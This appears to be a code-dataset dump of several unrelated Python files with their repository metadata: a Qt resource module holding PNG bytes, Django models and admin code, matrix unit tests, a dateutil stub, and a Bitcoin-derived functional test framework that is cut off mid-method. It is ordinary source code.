\xf0\x37\xdb\xdc\x8b\x3f\xd8\x8c\xa4\x06\x00\x00\x00\x00\x49\x45\
\x4e\x44\xae\x42\x60\x82\
\x00\x00\x04\x96\
\x89\
\x50\x4e\x47\x0d\x0a\x1a\x0a\x00\x00\x00\x0d\x49\x48\x44\x52\x00\
\x00\x00\x20\x00\x00\x00\x20\x08\x06\x00\x00\x00\x73\x7a\x7a\xf4\
\x00\x00\x04\x5d\x49\x44\x41\x54\x78\x5e\xed\x97\x5f\x88\x55\x55\
\x14\xc6\x7f\x6b\xef\x7d\x47\x9d\xc1\xcc\xd1\xb9\x33\x93\x9a\xe3\
\x9f\x34\xd1\xd1\x19\x15\x8d\xb0\x12\x91\x0c\xc2\x4a\x2b\x28\x11\
\xa2\x1e\x22\xc2\xa7\x1e\x8c\xe8\xb1\xb7\x88\x20\x21\x31\xc9\x7a\
\x8b\xa0\x88\xd4\x1e\xb2\xe9\x41\x24\x82\x5e\x52\x47\xa3\x8c\x8c\
\x89\xc4\x74\x66\x9a\xa1\x87\x2c\xbd\xf7\xec\xd5\x71\xb5\x71\x33\
\xdd\x49\x88\x31\x7d\xf1\x83\x7d\xd6\x3d\xeb\xae\xb3\xbe\x6f\xef\
\xb5\xf6\xf9\x23\xaa\xca\x8d\x84\xe3\x06\xe3\xa6\x00\x01\xc2\x37\
\xef\x3c\xf1\x85\xa3\xb6\x16\x8d\xf0\x7f\xf7\x84\x08\x88\x23\x52\
\xf9\x6a\xe9\x33\xef\xaf\x0b\x40\xf3\x65\xf2\xae\x6d\xef\x42\x2c\
\x30\x68\x44\x55\x91\xa4\x71\x62\x50\x14\x90\x44\x6c\x70\x9e\x81\
\xf7\x9e\x5e\x0b\x34\x07\x60\x12\x36\xf3\x82\xef\x3e\xd9\x69\x41\
\x33\x97\xdd\x0d\x51\x93\x5a\x99\x20\xbf\xda\xc0\x09\xc3\x27\xbf\
\x04\x8d\xdc\xb9\xf9\x55\xb3\xc0\xa4\x00\x08\x16\x04\xe2\x02\x4e\
\x3c\xde\x4d\x06\x07\x43\x27\x8e\x20\xfc\x47\x01\xd2\x28\x60\x66\
\xf7\xbd\x00\x78\x57\x21\x6a\x01\x9a\x84\x81\x84\x1c\x18\x69\xeb\
\x5e\x6f\x02\x10\x61\xe8\xf8\x61\xaa\x2b\x36\x80\x02\x92\x33\x83\
\x72\x35\x38\x51\x9c\xa4\x70\x85\x88\x30\x78\xec\x30\x33\x97\xaf\
\xb7\xfc\x26\x40\x23\x09\x24\x01\x8a\x6a\x44\x10\x10\xcf\x70\xbf\
\x91\x9b\x0f\x11\xc4\x55\x72\x29\xd4\x62\x01\x45\xc4\x99\x1f\x05\
\xa3\xd2\x82\xe1\x51\xa5\xff\x34\xd4\x0a\xa8\x04\x58\xbe\x00\xda\
\x7b\x36\x30\x58\x4e\x68\x46\x29\x40\x34\x92\xae\x6f\xd8\x86\x46\
\xf4\xeb\xc9\x23\x54\x7b\x36\x82\x0a\xe0\xcc\x77\x7a\xef\x4e\x7e\
\x7c\xfb\x25\x46\x3f\xdf\xcb\x48\xdf\x5b\x8c\x7e\xb6\x07\x17\x26\
\x97\xfe\x17\x19\x2d\xcf\x47\xfa\xf6\x30\x72\x68\x37\xde\x07\x8e\
\x9f\x56\x3a\x67\xc0\xba\x6e\x47\x67\x2b\xf4\xff\x10\x71\x22\xb4\
\xad\xd8\x68\xb9\x6d\x32\x19\x04\x32\x10\x09\x08\x1e\xf0\xa8\xa4\
\xe6\x51\x61\xe1\xf3\x6f\xe0\xc2\x24\x54\x04\x62\x5a\x01\x55\xee\
\xd8\xb1\x1b\x44\xd0\x18\x21\xd6\x40\x6b\xd4\xea\xca\x9c\xce\x26\
\x5a\xa7\x0a\xea\x94\x9f\xce\x5f\x04\xb1\x9c\x08\xde\x38\x1a\x04\
\x68\x3a\x88\x0f\x88\x73\x88\xf3\x08\x49\x80\x08\x02\x7c\xbf\xeb\
\x39\xc4\x7b\xa6\xcf\xed\x42\x55\xc9\xcd\xa1\x68\x51\xd0\xf6\xe0\
\x0b\x76\x6d\xc5\xc3\x99\xf3\x05\x4e\x2a\x9c\x39\x57\xb7\x73\x11\
\x8f\x0d\xe7\x8c\xc3\x52\x37\xae\x80\x5a\x50\x1e\x89\x04\x20\xc2\
\xa2\x1d\x6f\x5a\xcd\x35\xa9\xcd\xfc\x80\x46\x88\x75\x14\x47\xef\
\xe2\x29\x1c\x3d\xf5\x07\x03\x67\x6b\x54\x82\xb0\x66\x59\xb3\xf9\
\x85\x9c\x1b\x74\xdc\x12\xa4\x00\xd7\x20\xc0\x89\xe0\xf2\x5d\x12\
\x4d\x56\x10\x20\xf9\xd2\xaa\x75\xb6\x05\x6e\xab\x4e\xb1\x18\x55\
\x88\x51\x89\x2a\x88\xcb\xb9\xaf\xde\x03\x22\x63\x04\x48\x12\xf0\
\x61\xdf\x39\x16\xce\x69\x4e\x13\x56\x56\x2f\xbd\x95\x0f\xfa\x7e\
\x61\xc1\x6c\xf3\x65\xa4\xff\x57\x2e\x99\x46\x4c\x22\x72\x4e\x19\
\xb7\x07\x32\x4c\x9d\x33\x4b\x12\x60\x47\xe0\xb1\xfb\x67\xe5\xf9\
\x2a\x44\x85\xc7\x4b\x5f\x82\x11\x69\xfe\x8d\x91\x03\x08\xa8\x11\
\xe7\xdc\xe3\x0a\x50\xd4\xd4\x35\x96\x20\x1d\x63\x26\x10\x01\xe7\
\xb0\x06\xf3\xce\xfc\xd4\xea\x50\xa4\x18\x49\x31\x2a\x24\x87\x90\
\xcb\x1b\xd0\x7f\xed\x01\xef\x1b\x77\xc1\x58\x20\x80\xf7\x50\xaf\
\x2b\xbb\x0e\x2a\x27\x06\x60\x6a\x33\xbc\xb2\x5d\x98\x71\x8b\x10\
\x23\x68\x5e\x11\x3b\x8f\x2a\x70\x65\x17\x5c\xb5\x07\x7c\x43\x0f\
\xfc\x13\x4e\xa0\x29\xc0\xce\x7d\x35\x36\xad\xf2\xdc\xd7\x0d\xfb\
\x0e\x15\xbc\xf6\x11\x74\x55\xe1\xb7\xdf\x23\xd5\xe9\x8e\x98\xf4\
\xb7\x95\xa2\x36\xad\xf6\x68\xce\x3d\xbe\x00\x8b\xc6\x03\x02\x2e\
\x20\x80\xc6\x48\x03\x1c\x9c\x3a\x1b\x69\x6f\x75\x6c\xb9\xa7\x89\
\x07\x5e\xbe\xc0\x92\xdb\x1d\xf3\x3a\x84\x9e\x79\x81\x6f\x7f\x2e\
\xe8\x9d\xef\x89\x8a\x8d\xf9\xa5\x1f\x09\x20\x29\x37\x1e\xf4\x9f\
\x25\xd0\xbc\xbc\x6d\xbd\x8f\x30\x78\x6c\x3f\xd5\x9e\x87\x50\x29\
\xd2\x96\xcb\x10\x81\x8e\xe9\x9e\xa7\x36\x06\x2e\x5e\x12\x5e\x7f\
\xb6\x85\xc5\xb3\x1c\xf5\x88\xc5\xae\x5e\x54\x49\x25\x48\x03\x41\
\xf1\x0c\x1d\x3b\x40\xb5\xcc\xad\x5a\x90\x39\x21\x40\xee\x1a\xe7\
\x9b\x00\x68\x5f\xf9\x28\x83\x47\x3f\x2e\x2f\x78\x78\xdc\x3e\x68\
\x69\x2e\x47\x0b\xd4\x14\xe6\x76\xc0\x9f\x45\x22\x23\x03\x49\x03\
\x61\xe8\xe8\x01\xcb\x69\x72\xf0\xc6\x85\x64\x01\x58\xac\x73\x0c\
\xf7\x7f\x8a\x3d\x96\x7b\x36\x97\x22\xb6\x32\xf8\xf5\x7e\xab\xdb\
\x44\xa0\xaa\x25\xf9\x16\x80\x72\x15\x0e\x82\x38\x3a\xee\xda\x8e\
\xe4\x12\x64\xb9\xce\x05\x54\x23\x22\x66\x69\x5f\xb5\x15\x98\xc0\
\x5b\x91\x2a\xa0\x26\xc2\xb6\xa0\x0b\x66\x13\x5f\x16\x80\xf3\x88\
\x6f\xa2\xba\xe6\x49\x50\xb5\x3a\x89\x2a\xd7\x0a\x62\x07\xa1\x7d\
\xcd\x36\xb3\x25\x97\x71\x26\x01\xe8\xc5\xc2\x9d\x29\x5f\x12\x67\
\x13\x0b\x4c\x31\x66\xae\x2d\x52\xd9\x41\x8c\xfc\x32\x27\xa0\x02\
\x4c\x03\xba\x80\xd6\xeb\xf8\x9d\x10\x81\x11\x60\x20\x00\x17\x80\
\x01\xe0\x2c\x20\x5c\x1f\x28\x70\xc9\xb8\x6f\x34\x6e\x7e\x1d\xff\
\x05\x99\x91\xdf\x52\x52\xa7\x93\x17\x00\x00\x00\x00\x49\x45\x4e\
\x44\xae\x42\x60\x82\
"
qt_resource_name = "\
\x00\x07\
\x07\x3b\xe0\xb3\
\x00\x70\
\x00\x6c\x00\x75\x00\x67\x00\x69\x00\x6e\x00\x73\
\x00\x06\
\x07\x9c\xa3\xfd\
\x00\x73\
\x00\x65\x00\x73\x00\x6d\x00\x69\x00\x6d\
\x00\x09\
\x06\x76\x82\x67\
\x00\x63\
\x00\x72\x00\x6f\x00\x70\x00\x73\x00\x2e\x00\x70\x00\x6e\x00\x67\
\x00\x09\
\x09\xa9\x84\xc7\
\x00\x63\
\x00\x65\x00\x72\x00\x74\x00\x66\x00\x2e\x00\x70\x00\x6e\x00\x67\
"
qt_resource_struct = "\
\x00\x00\x00\x00\x00\x02\x00\x00\x00\x01\x00\x00\x00\x01\
\x00\x00\x00\x00\x00\x02\x00\x00\x00\x01\x00\x00\x00\x02\
\x00\x00\x00\x14\x00\x02\x00\x00\x00\x02\x00\x00\x00\x03\
\x00\x00\x00\x26\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\
\x00\x00\x00\x3e\x00\x00\x00\x00\x00\x01\x00\x00\x06\xab\
"
def qInitResources():
QtCore.qRegisterResourceData(0x01, qt_resource_struct, qt_resource_name, qt_resource_data)
def qCleanupResources():
QtCore.qUnregisterResourceData(0x01, qt_resource_struct, qt_resource_name, qt_resource_data)
qInitResources()
| [
"aagii_csms@yahoo.com"
] | aagii_csms@yahoo.com |
1fa4211910a147f06100b61c294ba7cdcfedf97e | 91d45f1a41e092ee2ed992c8b1f7f24b0c12ac4a | /DIM/coursework/rct/models.py | fc77802354bd147008cb6f385e2bddc199484018 | [] | no_license | MatthewPaterson/DIM3 | 94d7c4a9a3d0cdd67ec57f76e8c83f4730a8d376 | 7bf8c42d17add5e56a4342b2fb408ce2bdf98c4f | refs/heads/master | 2021-01-01T16:55:28.357095 | 2014-02-04T09:01:10 | 2014-02-04T09:01:10 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 411 | py | from django.db import models
class Category(models.Model):
name = models.CharField(max_length=128, unique=True)
def __unicode__(self):
return self.name
class Page(models.Model):
category = models.ForeignKey(Category)
title = models.CharField(max_length=128)
url = models.URLField()
views = models.IntegerField(default=0)
def __unicode__(self):
return self.title
| [
"matty.mep@gmail.com"
] | matty.mep@gmail.com |
a3a07052f03a7dc28d6f2c41f80889cbc46bc905 | 32c6590127686114bfacff11fa7cd646025d3819 | /test_project/test_app/models.py | e45ce8711f5854e739457ed3382e0356433d6b1c | [
"BSD-2-Clause"
] | permissive | revsys/django-test-plus | 42cc6cddde30f561bec91294d2e85c21cbc62887 | 9cfb0c865b1dcad1ca6c9c4717d67ea8d476269c | refs/heads/main | 2023-08-29T03:52:59.089300 | 2023-07-11T11:37:47 | 2023-07-11T11:37:47 | 36,131,033 | 618 | 75 | BSD-3-Clause | 2023-07-11T11:35:24 | 2015-05-23T16:08:52 | Python | UTF-8 | Python | false | false | 154 | py | from django.db import models
class Data(models.Model):
""" Simple model to test our query assertions """
name = models.CharField(max_length=50)
| [
"frank@revsys.com"
] | frank@revsys.com |
44b8b51883b7aebaf72aacdb0dab83ffcaaf63fd | 0e62ab1b733a60ec4c41e9a7a4c667b53be02964 | /functional_tests/integ_tests.py | e7ea53c275716de573bb69f22ff784ecf3f1dce7 | [] | no_license | julianaskubs/Python-Arrays | 3e3822dd3b63a688c7078e45044fc2452f96e554 | 741703c26a64e965444a3a0add5c355061a3888e | refs/heads/master | 2020-12-22T17:35:51.432223 | 2016-08-15T21:17:18 | 2016-08-15T21:17:18 | 65,694,899 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,046 | py | from main.matrix import RunProgram as RP
import unittest
class MatrixIntegTest(unittest.TestCase):
def test_steps_one(self):
cmd = "I 5 6"
matrix = RP(prompt=False, cmd=cmd)
cmd = "L 2 3 A"
RP(prompt=False, cmd=cmd, matrix=matrix.matrix)
cmd = "S one.bmp"
RP(prompt=False, cmd=cmd, matrix=matrix.matrix)
matrix_eg = [[0, 0, 0, 0, 0],
[0, 0, 0, 0, 0],
[0, 'A', 0, 0, 0],
[0, 0, 0, 0, 0],
[0, 0, 0, 0, 0],
[0, 0, 0, 0, 0]]
self.assertEquals(matrix.matrix, matrix_eg)
def test_steps_two(self):
matrix = [[0, 0, 0, 0, 0],
[0, 0, 0, 0, 0],
[0, 'A', 0, 0, 0],
[0, 0, 0, 0, 0],
[0, 0, 0, 0, 0],
[0, 0, 0, 0, 0]]
cmd = "G 2 3 J"
RP(prompt=False, cmd=cmd, matrix=matrix)
cmd = "V 2 3 4 W"
RP(prompt=False, cmd=cmd, matrix=matrix)
cmd = "H 3 4 2 Z"
RP(prompt=False, cmd=cmd, matrix=matrix)
cmd = "F 3 3 J"
RP(prompt=False, cmd=cmd, matrix=matrix)
cmd = "S two.bmp"
RP(prompt=False, cmd=cmd, matrix=matrix)
matrix_eg = [['J', 'J', 'J', 'J', 'J'],
['J', 'J', 'Z', 'Z', 'J'],
['J', 'W', 'J', 'J', 'J'],
['J', 'W', 'J', 'J', 'J'],
['J', 'J', 'J', 'J', 'J'],
['J', 'J', 'J', 'J', 'J']]
self.assertEquals(matrix, matrix_eg)
def test_steps_three(self):
cmd = "I 10 9"
matrix = RP(prompt=False, cmd=cmd)
cmd = "L 5 3 A"
RP(prompt=False, cmd=cmd, matrix=matrix.matrix)
cmd = "G 2 3 J"
RP(prompt=False, cmd=cmd, matrix=matrix.matrix)
cmd = "V 2 3 4 W"
RP(prompt=False, cmd=cmd, matrix=matrix.matrix)
cmd = "H 1 10 5 Z"
RP(prompt=False, cmd=cmd, matrix=matrix.matrix)
cmd = "F 3 3 J"
RP(prompt=False, cmd=cmd, matrix=matrix.matrix)
cmd = "K 2 7 8 8 E"
RP(prompt=False, cmd=cmd, matrix=matrix.matrix)
cmd = "F 9 9 R"
RP(prompt=False, cmd=cmd, matrix=matrix.matrix)
cmd = "S one.bmp"
RP(prompt=False, cmd=cmd, matrix=matrix.matrix)
matrix_eg = \
[['J', 'J', 'J', 'J', 'J', 'J', 'J', 'J', 'J', 'J'],
['J', 'J', 'J', 'J', 'J', 'J', 'J', 'J', 'J', 'J'],
['J', 'W', 'J', 'J', 'A', 'J', 'J', 'J', 'J', 'J'],
['J', 'W', 'J', 'J', 'J', 'J', 'J', 'J', 'J', 'J'],
['Z', 'Z', 'Z', 'Z', 'Z', 'Z', 'Z', 'Z', 'Z', 'Z'],
['R', 'R', 'R', 'R', 'R', 'R', 'R', 'R', 'R', 'R'],
['R', 'E', 'E', 'E', 'E', 'E', 'E', 'E', 'R', 'R'],
['R', 'E', 'E', 'E', 'E', 'E', 'E', 'E', 'R', 'R'],
['R', 'R', 'R', 'R', 'R', 'R', 'R', 'R', 'R', 'R']]
self.assertEquals(matrix.matrix, matrix_eg)
if __name__ == '__main__':
unittest.main()
| [
"julianaskubs@gmail.com"
] | julianaskubs@gmail.com |
053f64e6385d70d8e49c045ff44d38e56873a99a | d4a569dcf616b7f05e53a44803e38196b436b8b9 | /Thesis@3.9.1/Lib/site-packages/mypy/typeshed/third_party/2and3/dateutil/utils.pyi | 3eefd2e48ba5311cbdb709991a6815cdd94459e1 | [
"MIT"
] | permissive | nverbois/TFE21-232 | ac3178d24939c872c02a671c0f1d8cc471af516b | 7113837b5263b5c508bfc6903cb6982b48aa7ee4 | refs/heads/main | 2023-06-05T18:50:59.207392 | 2021-06-25T19:54:40 | 2021-06-25T19:54:40 | 337,691,391 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 281 | pyi | from typing import Optional
from datetime import datetime, tzinfo, timedelta
def default_tzinfo(dt: datetime, tzinfo: tzinfo) -> datetime: ...
def today(tzinfo: Optional[tzinfo] = ...) -> datetime: ...
def within_delta(dt1: datetime, dt2: datetime, delta: timedelta) -> bool: ...
| [
"38432529+nverbois@users.noreply.github.com"
] | 38432529+nverbois@users.noreply.github.com |
4e65987083f85dd67d34e904f53f16c42343b409 | b192e89439bcb698a2c36d8fef77ed296efa6e92 | /src/dataStorage/admin.py | f113c2f3df91a438c492e1c95253047d7b5d7648 | [] | no_license | rshnGhost/mTSA | 091950f3f4e77b03add97135cbaf6f91acded683 | 269ce5d69c025a095df63fd4c891c4422ce4c1f1 | refs/heads/master | 2023-06-30T11:16:29.650723 | 2021-08-11T08:31:59 | 2021-08-11T08:31:59 | 290,937,283 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,704 | py | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.contrib import admin
from .models import phoneData
from .models import phoneImg
from .models import phoneBench
from .models import PosTweet, NegTweet, NeuTweet
from .models import cache, phoneWeb, antutu
class PosTweetInline(admin.TabularInline):#StackedInline
model = PosTweet
extra = 0
class NegTweetInline(admin.TabularInline):#StackedInline
model = NegTweet
extra = 0
class NeuTweetInline(admin.TabularInline):#StackedInline
model = NeuTweet
extra = 0
class phoneDataAdmin(admin.ModelAdmin):
list_display = ["name", "modelNo", "price", "picture"]
list_display_links = ["name"]
list_editable = ["price"]
list_filter = ["name", "modelNo"]
search_fields = ["modelNo", "name"]
class Meta:
model = phoneData
class phoneBenchAdmin(admin.ModelAdmin):
list_display = ["device", "pt", "nt", "net", "cpu", "gpu", "mem", "ux", "total" ]
list_display_links = ["device"]
#list_editable = ["pt", "net", "nt"]
list_filter = ["device", "total"]
search_fields = ["modelNo"]
inlines = [PosTweetInline, NegTweetInline, NeuTweetInline]
class Meta:
model = phoneBench
class cacheAdmin(admin.ModelAdmin):
list_display = ["name", "tag", "satuts" ]
list_display_links = ["name"]
list_editable = ["satuts"]
list_filter = ["name", "satuts"]
class Meta:
model = cache
# Register your models here.
admin.site.register(phoneData, phoneDataAdmin)
admin.site.register(phoneImg)
admin.site.register(antutu)
admin.site.register(PosTweet)
admin.site.register(NegTweet)
admin.site.register(NeuTweet)
admin.site.register(phoneWeb)
admin.site.register(cache, cacheAdmin)
admin.site.register(phoneBench, phoneBenchAdmin)
| [
"31742263+rshnGhost@users.noreply.github.com"
] | 31742263+rshnGhost@users.noreply.github.com |
649a77c31f62e5ca93fedfcab0d01dffe100e65d | 30231faf0439d40263ea033aa6692d50d995dcdf | /test/functional/test_framework/test_framework.py | afc326a6746f48448f0dbba2366c41c3f12f8cf0 | [
"MIT"
] | permissive | zuka2512/Sosscoin | c6f59fb07ce3c88839f124b273c9bfc2fa1ffe26 | 8e81695c4606405fbf3ba41ab2bb56cd09bd631e | refs/heads/master | 2020-06-04T09:37:12.821794 | 2019-06-14T15:55:36 | 2019-06-14T15:55:36 | 191,967,814 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 20,225 | py | #!/usr/bin/env python3
# Copyright (c) 2014-2016 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Base class for RPC testing."""
from collections import deque
from enum import Enum
import logging
import optparse
import os
import pdb
import shutil
import sys
import tempfile
import time
import traceback
from .authproxy import JSONRPCException
from . import coverage
from .test_node import TestNode
from .util import (
MAX_NODES,
PortSeed,
assert_equal,
check_json_precision,
connect_nodes_bi,
disconnect_nodes,
initialize_datadir,
log_filename,
p2p_port,
set_node_times,
sync_blocks,
sync_mempools,
)
class TestStatus(Enum):
PASSED = 1
FAILED = 2
SKIPPED = 3
TEST_EXIT_PASSED = 0
TEST_EXIT_FAILED = 1
TEST_EXIT_SKIPPED = 77
class BitcoinTestFramework(object):
    """Base class for a sosscoin test script.
    Individual sosscoin test scripts should subclass this class and override the set_test_params() and run_test() methods.
    Individual tests can also override the following methods to customize the test setup:
    - add_options()
    - setup_chain()
    - setup_network()
    - setup_nodes()
    The __init__() and main() methods should not be overridden.
    This class also contains various public and private helper methods."""
    def __init__(self):
        """Sets test framework defaults. Do not override this method. Instead, override the set_test_params() method"""
        self.setup_clean_chain = False
        self.nodes = []
        self.mocktime = 0
        self.set_test_params()
        # num_nodes is mandatory: node creation and startup are sized off it.
        assert hasattr(self, "num_nodes"), "Test must set self.num_nodes in set_test_params()"
    def main(self):
        """Main function. This should not be overridden by the subclass test scripts.
        Parses options, runs setup_chain()/setup_network()/run_test(), then
        shuts nodes down, cleans up and exits with a TEST_EXIT_* code."""
        # --- Command-line options common to every test script ---
        parser = optparse.OptionParser(usage="%prog [options]")
        parser.add_option("--nocleanup", dest="nocleanup", default=False, action="store_true",
                          help="Leave sosscoinds and test.* datadir on exit or error")
        parser.add_option("--noshutdown", dest="noshutdown", default=False, action="store_true",
                          help="Don't stop sosscoinds after the test execution")
        parser.add_option("--srcdir", dest="srcdir", default=os.path.normpath(os.path.dirname(os.path.realpath(__file__)) + "/../../../src"),
                          help="Source directory containing sosscoind/sosscoin-cli (default: %default)")
        parser.add_option("--cachedir", dest="cachedir", default=os.path.normpath(os.path.dirname(os.path.realpath(__file__)) + "/../../cache"),
                          help="Directory for caching pregenerated datadirs")
        parser.add_option("--tmpdir", dest="tmpdir", help="Root directory for datadirs")
        parser.add_option("-l", "--loglevel", dest="loglevel", default="INFO",
                          help="log events at this level and higher to the console. Can be set to DEBUG, INFO, WARNING, ERROR or CRITICAL. Passing --loglevel DEBUG will output all logs to console. Note that logs at all levels are always written to the test_framework.log file in the temporary test directory.")
        parser.add_option("--tracerpc", dest="trace_rpc", default=False, action="store_true",
                          help="Print out all RPC calls as they are made")
        parser.add_option("--portseed", dest="port_seed", default=os.getpid(), type='int',
                          help="The seed to use for assigning port numbers (default: current process id)")
        parser.add_option("--coveragedir", dest="coveragedir",
                          help="Write tested RPC commands into this directory")
        parser.add_option("--configfile", dest="configfile",
                          help="Location of the test framework config file")
        parser.add_option("--pdbonfailure", dest="pdbonfailure", default=False, action="store_true",
                          help="Attach a python debugger if test fails")
        self.add_options(parser)
        (self.options, self.args) = parser.parse_args()
        PortSeed.n = self.options.port_seed
        # Put the freshly-built binaries (and their Qt variants) first on PATH.
        os.environ['PATH'] = self.options.srcdir + ":" + self.options.srcdir + "/qt:" + os.environ['PATH']
        check_json_precision()
        self.options.cachedir = os.path.abspath(self.options.cachedir)
        # Set up temp directory and start logging
        if self.options.tmpdir:
            self.options.tmpdir = os.path.abspath(self.options.tmpdir)
            os.makedirs(self.options.tmpdir, exist_ok=False)
        else:
            self.options.tmpdir = tempfile.mkdtemp(prefix="test")
        self._start_logging()
        # --- Run the test; any exception type below marks a failure/skip ---
        success = TestStatus.FAILED
        try:
            self.setup_chain()
            self.setup_network()
            self.run_test()
            success = TestStatus.PASSED
        except JSONRPCException as e:
            self.log.exception("JSONRPC error")
        except SkipTest as e:
            self.log.warning("Test Skipped: %s" % e.message)
            success = TestStatus.SKIPPED
        except AssertionError as e:
            self.log.exception("Assertion failed")
        except KeyError as e:
            self.log.exception("Key error")
        except Exception as e:
            self.log.exception("Unexpected exception caught during testing")
        except KeyboardInterrupt as e:
            self.log.warning("Exiting after keyboard interrupt")
        if success == TestStatus.FAILED and self.options.pdbonfailure:
            print("Testcase failed. Attaching python debugger. Enter ? for help")
            pdb.set_trace()
        # --- Teardown: stop nodes and clean up datadirs unless told otherwise ---
        if not self.options.noshutdown:
            self.log.info("Stopping nodes")
            if self.nodes:
                self.stop_nodes()
        else:
            self.log.info("Note: sosscoinds were not stopped and may still be running")
        if not self.options.nocleanup and not self.options.noshutdown and success != TestStatus.FAILED:
            self.log.info("Cleaning up")
            shutil.rmtree(self.options.tmpdir)
        else:
            self.log.warning("Not cleaning up dir %s" % self.options.tmpdir)
            if os.getenv("PYTHON_DEBUG", ""):
                # Dump the end of the debug logs, to aid in debugging rare
                # travis failures.
                import glob
                filenames = [self.options.tmpdir + "/test_framework.log"]
                filenames += glob.glob(self.options.tmpdir + "/node*/regtest/debug.log")
                MAX_LINES_TO_PRINT = 1000
                for fn in filenames:
                    try:
                        with open(fn, 'r') as f:
                            print("From", fn, ":")
                            print("".join(deque(f, MAX_LINES_TO_PRINT)))
                    except OSError:
                        print("Opening file %s failed." % fn)
                        traceback.print_exc()
        if success == TestStatus.PASSED:
            self.log.info("Tests successful")
            sys.exit(TEST_EXIT_PASSED)
        elif success == TestStatus.SKIPPED:
            self.log.info("Test skipped")
            sys.exit(TEST_EXIT_SKIPPED)
        else:
            self.log.error("Test failed. Test logging available at %s/test_framework.log", self.options.tmpdir)
            logging.shutdown()
            sys.exit(TEST_EXIT_FAILED)
    # Methods to override in subclass test scripts.
    def set_test_params(self):
        """Tests must override this method to change default values for number of nodes, topology, etc"""
        raise NotImplementedError
    def add_options(self, parser):
        """Override this method to add command-line options to the test"""
        pass
    def setup_chain(self):
        """Override this method to customize blockchain setup"""
        self.log.info("Initializing test directory " + self.options.tmpdir)
        if self.setup_clean_chain:
            self._initialize_chain_clean()
        else:
            self._initialize_chain()
    def setup_network(self):
        """Override this method to customize test network topology"""
        self.setup_nodes()
        # Connect the nodes as a "chain". This allows us
        # to split the network between nodes 1 and 2 to get
        # two halves that can work on competing chains.
        for i in range(self.num_nodes - 1):
            connect_nodes_bi(self.nodes, i, i + 1)
        self.sync_all()
    def setup_nodes(self):
        """Override this method to customize test node setup"""
        extra_args = None
        if hasattr(self, "extra_args"):
            extra_args = self.extra_args
        self.add_nodes(self.num_nodes, extra_args)
        self.start_nodes()
    def run_test(self):
        """Tests must override this method to define test logic"""
        raise NotImplementedError
    # Public helper methods. These can be accessed by the subclass test scripts.
    def add_nodes(self, num_nodes, extra_args=None, rpchost=None, timewait=None, binary=None):
        """Instantiate TestNode objects"""
        if extra_args is None:
            extra_args = [[]] * num_nodes
        if binary is None:
            binary = [None] * num_nodes
        assert_equal(len(extra_args), num_nodes)
        assert_equal(len(binary), num_nodes)
        for i in range(num_nodes):
            self.nodes.append(TestNode(i, self.options.tmpdir, extra_args[i], rpchost, timewait=timewait, binary=binary[i], stderr=None, mocktime=self.mocktime, coverage_dir=self.options.coveragedir))
    def start_node(self, i, extra_args=None, stderr=None):
        """Start a sosscoind"""
        node = self.nodes[i]
        node.start(extra_args, stderr)
        node.wait_for_rpc_connection()
        if self.options.coveragedir is not None:
            coverage.write_all_rpc_commands(self.options.coveragedir, node.rpc)
    def start_nodes(self, extra_args=None):
        """Start multiple sosscoinds"""
        if extra_args is None:
            extra_args = [None] * self.num_nodes
        assert_equal(len(extra_args), self.num_nodes)
        try:
            # Start all processes first, then wait for all RPC connections, so
            # the nodes come up in parallel rather than one at a time.
            for i, node in enumerate(self.nodes):
                node.start(extra_args[i])
            for node in self.nodes:
                node.wait_for_rpc_connection()
        except:
            # If one node failed to start, stop the others
            self.stop_nodes()
            raise
        if self.options.coveragedir is not None:
            for node in self.nodes:
                coverage.write_all_rpc_commands(self.options.coveragedir, node.rpc)
    def stop_node(self, i):
        """Stop a bitcoind test node"""
        self.nodes[i].stop_node()
        self.nodes[i].wait_until_stopped()
    def stop_nodes(self):
        """Stop multiple bitcoind test nodes"""
        for node in self.nodes:
            # Issue RPC to stop nodes
            node.stop_node()
        for node in self.nodes:
            # Wait for nodes to stop
            node.wait_until_stopped()
    def assert_start_raises_init_error(self, i, extra_args=None, expected_msg=None):
        """Assert that starting node i fails during init, optionally checking
        that expected_msg appears in the node's stderr output."""
        with tempfile.SpooledTemporaryFile(max_size=2**16) as log_stderr:
            try:
                self.start_node(i, extra_args, stderr=log_stderr)
                self.stop_node(i)
            except Exception as e:
                assert 'sosscoind exited' in str(e) # node must have shutdown
                self.nodes[i].running = False
                self.nodes[i].process = None
                if expected_msg is not None:
                    log_stderr.seek(0)
                    stderr = log_stderr.read().decode('utf-8')
                    if expected_msg not in stderr:
                        raise AssertionError("Expected error \"" + expected_msg + "\" not found in:\n" + stderr)
            else:
                # start_node() succeeded, which is itself the failure here.
                if expected_msg is None:
                    assert_msg = "sosscoind should have exited with an error"
                else:
                    assert_msg = "sosscoind should have exited with expected error " + expected_msg
                raise AssertionError(assert_msg)
    def wait_for_node_exit(self, i, timeout):
        """Block until node i's process exits, or raise after timeout seconds."""
        self.nodes[i].process.wait(timeout)
    def split_network(self):
        """
        Split the network of four nodes into nodes 0/1 and 2/3.
        """
        disconnect_nodes(self.nodes[1], 2)
        disconnect_nodes(self.nodes[2], 1)
        self.sync_all([self.nodes[:2], self.nodes[2:]])
    def join_network(self):
        """
        Join the (previously split) network halves together.
        """
        connect_nodes_bi(self.nodes, 1, 2)
        self.sync_all()
    def sync_all(self, node_groups=None):
        """Sync blocks and mempools within each node group (default: all nodes)."""
        if not node_groups:
            node_groups = [self.nodes]
        for group in node_groups:
            sync_blocks(group)
            sync_mempools(group)
    def enable_mocktime(self):
        """Enable mocktime for the script.
        mocktime may be needed for scripts that use the cached version of the
        blockchain. If the cached version of the blockchain is used without
        mocktime then the mempools will not sync due to IBD.
        For backward compatibility of the python scripts with previous
        versions of the cache, this helper function sets mocktime to Jan 1,
        2014 + (201 * 10 * 60)"""
        self.mocktime = 1388534400 + (201 * 10 * 60)
    def disable_mocktime(self):
        """Reset mocktime to 0 (i.e. use real wall-clock time)."""
        self.mocktime = 0
    # Private helper methods. These should not be accessed by the subclass test scripts.
    def _start_logging(self):
        # Add logger and logging handlers
        self.log = logging.getLogger('TestFramework')
        self.log.setLevel(logging.DEBUG)
        # Create file handler to log all messages
